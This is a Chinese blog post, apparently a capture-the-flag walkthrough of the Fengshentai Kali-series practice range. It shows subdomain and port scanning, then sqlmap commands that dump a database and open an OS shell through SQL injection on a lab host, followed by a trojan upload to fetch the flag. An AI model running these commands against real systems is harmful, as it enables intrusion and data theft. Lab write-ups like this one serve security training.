封神台旧靶场-kali系列

最新推荐文章于 2024-05-11 21:54:12 发布
最新推荐文章于 2024-05-11 21:54:12 发布
阅读量3.2k 收藏 2
点赞数
文章标签: 安全 web安全 https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43446292/article/details/122937338
版权

一、信息搜集之: 子域名探测
下载此字典:https://hack.zkaq.cn/file/down?id=f80ff6b197c0773b
然后利用layer进行子域名扫描,得到子域名为shop.aqlab.cn
在这里插入图片描述二、信息搜集:端口扫描
namp对shop.aqlab.cn进行扫描,得到端口号为8001,flag为8001,根据上一关也可得知端口号为8001
三、漏洞扫描 - web扫描器
对http://shop.aqlab.cn:8001/进行目录扫描,flag在robots.txt目录下
在这里插入图片描述
四、注入测试-sqlmap
注入点为http://shop.aqlab.cn:8001/single.php?id=1,使用sqlmap进行探测
在这里插入图片描述
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --dbs得到数据库
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 -D cake --dump-all数获取cake数据库表的内容,得到flag
在这里插入图片描述
五、Sqlmap --os-shell
使用python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-shell
在这里插入图片描述
无法使用cmd命令查看flag.php文件,选择在http://shop.aqlab.cn:8001/tmpupjua.php上传木马,得到flag
在这里插入图片描述

weixin_43446292
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ZVuldrill 黑客靶场 附带安装教程
01-26
平台中有10个挑战,包含的漏洞有: ·SQL注入 ·储存型和反射型XSS ·CSRF ·文件包含 ·后台弱口令 ·文件上传 ·目录遍历 ·权限跨越
靶机渗透测试4
qq_52191935的博客
09-01 1320
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag,并得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
kali搭建Vulhub靶场
最新发布
MateSnake的博客
05-11 1710
kali搭建Vulhub靶场
靶机渗透测试1
qq_52191935的博客
08-30 698
测试环境:靶机+kali 1.通过nmap扫描存活主机,得到靶机IP为192.168.152.131 2.扫描开放端口,得到22(SSH),80(HTTP),31337(HTTP) 3.尝试访问开放端口,没有收获 4.尝试对网站目录进行扫描 80端口没有收获 31337端口得到如下目录 5.尝试访问各个文件目录 前三项未发现可用信息 在robots.txt中发现新文件目录 访问后得到首个flag 6.访问.ssh得到文件提示 下载三...
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1703
神台靶场 第一章:为了女神小芳 (SQL注入)
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 1455
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
minidwep-gtk-kali_40420_amd64.deb
05-22
本工具(水滴minidwep-gtk)仅仅只用于个人无线网络渗透测试,严禁其他任何用途!!
linux-headers-5.10.0-kali7-amd64_5.10.28-1kali1_amd64.deb
07-25
kali安装后,安装虚拟机tools需要的linux头文件
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
daxueba-kali-linux-tutorial.zip
03-01
daxueba-kali-linux-tutorial pdf资源
penetration-testing-with-kali.pdf
08-10
"Kali Linux 渗透测试" Kali Linux 是一种基于 Debian 的 Linux 发行版,专门为数字 forensics 和渗透测试而设计。它提供了大量的渗透测试工具和实用程序,以帮助安全专业人员执行渗透测试和漏洞评估。 渗透测试是...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台靶场 - Kali系列
Hong__Cheng的博客
06-07 499
我在参考 目难忘 大佬的文章时。我看到接下来的操作时,有点懵逼了,这么复杂的嘛?不是就是要管理员密码?所以我直接就进入到phpstudy中去找果然,如图的三个文件,文件名中有admin的,我猜测这其中就有我想要的密码,直接下载下来。最近一直在打靶场,这个《Kali渗透 - Sqlmap实操靶场》搞了好久都没搞出来,在网上搜索教程也不多,但今天突然灵光一现找到的flag,特意发出来与大家分享,我也是初学者,耍了点小聪明,不过也算是成功了。我用的Notepad++依次打开这些文件,其中一个是这样的。
靶机16 GROTESQUE: 2
honest_gg的博客
10-12 1145
简介:获取标志(难度: 中等)
神台ctf练习靶场——一月靶场
AlunXZhou的博客
03-18 1519
神台刷题
HTB靶机:RainyDay
LainWith的博客
11-27 1696
系统:linux难度:困难发布日期:2022/10/16其他信息:2022年10月24日靶场删除了泄露的root的 SSH 密钥,并更改了泄露的root密码。个人打靶发现靶机还删除了python,其他变化尚未发现。补充:这台靶机与Vulnhub靶机较为相似,只是利用起来更复杂很多。
SSD09 Exam02 Practical
PC的€$~!@#%
03-28 170
详情见附件 Use the technique of noun extraction to identify the possible classes in the following use case scenario for a software system that controls an assembly line: The sensor ...
exam02-1
weixin_30242907的博客
05-05 89
activity_main.xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="match_parent" android:lay...
神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4667
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
awvs-kali-15.3
04-30
AWVS-Kali-15.3是指Acunetix Web Vulnerability Scanner(AWVS)在Kali Linux 15.3版本上的安装和使用。AWVS是一款常用的Web应用程序漏洞扫描工具,用于检测和识别Web应用程序中的安全漏洞。 在Kali Linux 15.3上安装AWVS可以通过以下骤完成: 1. 打开终端,使用apt-get命令安装AWVS的依赖项:sudo apt-get install libssl1.0.0 libjpeg62-turbo 2. 下载AWVS的安装包,可以从Acunetix官方网站上获取。 3. 解压安装包,并进入解压后的目录。 4. 运行安装脚本:sudo ./install.sh 5. 安装过程中会提示输入许可证密钥,根据提示输入正确的密钥。 6. 安装完成后,可以在应用程序菜单中找到AWVS,并启动它。 使用AWVS进行漏洞扫描时,可以通过以下进行: 1. 打开AWVS应用程序。 2. 在扫描目标中输入要扫描的URL或IP地址。 3. 配置扫描选项,如扫描策略、扫描深度等。 4. 点击开始扫描按钮,等待扫描结果生成。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值